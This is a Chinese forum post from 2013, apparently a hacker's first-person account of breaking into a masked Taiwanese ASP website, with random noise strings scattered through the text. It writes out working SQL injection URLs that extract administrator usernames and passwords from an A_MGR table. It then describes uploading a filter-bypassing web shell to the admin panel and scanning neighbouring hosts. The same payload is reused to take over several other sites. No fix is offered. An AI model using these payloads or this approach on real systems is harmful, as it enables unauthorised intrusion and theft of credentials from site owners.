发现一个注入点/ B3 z8 }; @+ s" O, Q" r
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
" B) x* k2 a0 P7 |5 c8 X5 R0 L0 c2 P2 V
习惯性的加’having1=1--) O& Y6 O. e! {( s0 i
0 X% ~9 r0 C: m# r
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
1 D5 H; b. ?5 b. q( c7 [1 a) m: p: A* K: j2 H1 Z+ Q V# b6 }+ s
0
$ K0 P9 K1 ^6 w0 N: C" Z. P+ h
5 C! I3 N' e, {2 |( M; l/ m/ Q! E爆出Diary_A.dl_Title(这时候很激动啊)5 \3 y: S& s) d$ T. r/ e0 }# s
/ l' i6 k5 b! P$ p& _+ O# E: x, t$ Y& m
那么继续9 k% z2 G( c6 E
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—! J i, i8 t0 P) z% E3 s
$ k" W5 K% }) P0 I5 i+ }5 l继续,一直爆下去
* o0 Q2 k% f( l; } z% I+ l& i4 R' o0 ?- L) Z+ B
爆到几个字段和表段 但是没找到需要的管理用户的字段
" ^! x" g/ V% u0 t& g! A! H8 [ `) H* q8 _& ^
蛋疼了 怎么办 然后去后台登陆页看源码
! g! S2 f: n1 Q5 l. I7 f+ k# L3 u& n7 {! t0 g
0
! i* v7 h' Y+ ]) i' P$ u4 H7 |; P3 m
; e$ {& x( R$ {- y! YInput name= “ADUID”% h6 F2 L, r' J5 n+ v) q
Input name= “ADPWD”
1 [- p! `9 C& q7 u7 ^% n) g+ p g8 F' R& v4 w
很幸运 找到了字段那就继续
. K5 K! o% J+ M. w! V8 H找到之后开始爆用户. C8 a8 J( a& a: N3 ~1 A5 ^1 z, s
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
( L; G+ O* |/ P6 l爆密码
8 _. o9 P- R8 g9 Y2 ~http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—2 G, H" B- I' q. v& j/ K0 ^
测试了下 这个注入点只能爆到文章哪里的表 % h$ m3 e$ G$ a N, t3 i1 a% g
7 L/ w7 K8 k9 Q: n7 u头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
% z4 w m0 j9 G0 w1 [! Y# b. y, E
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
9 F+ c0 L4 Q L+ B8 c& Z$ Z1 ^' `
$ _+ _9 E2 p! O, [" N6 Z: j473
1 |; ?7 G- }% a0 T$ n! {" Z# w# w8 B9 j
7 A% t( J5 L2 H8 ^. ?4 |& f进后台
$ r7 ?% J/ ~# z# d, i: h/ n' _/ W- B' P8 M
( b# I) }, x6 X( q6 q
发现几个上传点 有的地方不能上传 而且防止恶意代码9 ?( @, ~+ d4 P' \/ r4 B" x; m
1 ~0 m$ {7 D( J. {) O$ w& }没办法 各种百度各种找大牛 找到一只好像可以突破的马
H; L, l, {+ L( X. V6 d' I M1 M1 x" I+ u
( s$ w8 r: u- ]- [在系统管理那里直接上传 不过没有显示地址
: v' t( D% T0 h* F" a9 a* Q9 o7 A3 q9 B1 Q) m: ]
再上传一次 抓包 搞定OK: u3 {7 v) d& H. S
& V: R7 D+ H9 h @8 V0 s, M# w
! W5 Q' {! P0 k4 i" ^
5 M; b% E$ \. v* L$ v472; q9 A+ _9 K, Y: O
' G4 J) D* a, }晚上不行了 去睡觉。。。
$ ^0 d# ?; {+ f6 s M' Y% K$ m第二天刚起床 闲的没事做继续日站吧
, A) s( b/ @. V! z& _+ v
& k4 I1 ^4 m# D) i$ o' b$ E找个站 就把这个站的旁c扫了下
0 J+ n9 f( W8 {3 l8 G6 J7 W6 n0 l- Y2 G y2 W& {1 V
发现c段也有一个购物站 ,然后还和这个站的模板差不多
6 y; P0 A! R) o E3 S# d' Y2 B! a
就找到会员登录口测试
7 q; S! V1 }2 L+ D! I" f O6 F$ ?! p
'and (select top 1 MGR_UID from A_MGR)>0—
: \' ]- O5 a/ y% ^2 s7 G# M果断爆到了 这时候我很激动 通杀9 i V @) |/ s" e
7 o! \% T4 N' O3 u& i再次翻c段5 Y4 i0 U# t4 [ G6 z, ?
m. x0 s9 Q! ~6 j% b3 W
翻出几个站 都成功拿下 k# ~' t% s) C5 z
' s" R. [% y# [7 Z, s
$ D8 o" b- e6 s& ]/ G2 P0 e. Q. G7 n7 P' f
修复方案:' N( }4 b. f7 w& l2 P8 r3 t
他们比我专业 - J- o1 \* L6 l' j1 X
7 i A3 m5 e- p2 u# ^
) s- J) D. `: Q0 G# R2 h4 h! _; D: g9 P: c4 ^* r v t; V# D
|
发表于 2013-4-4 17:40:38
收藏
支持
反对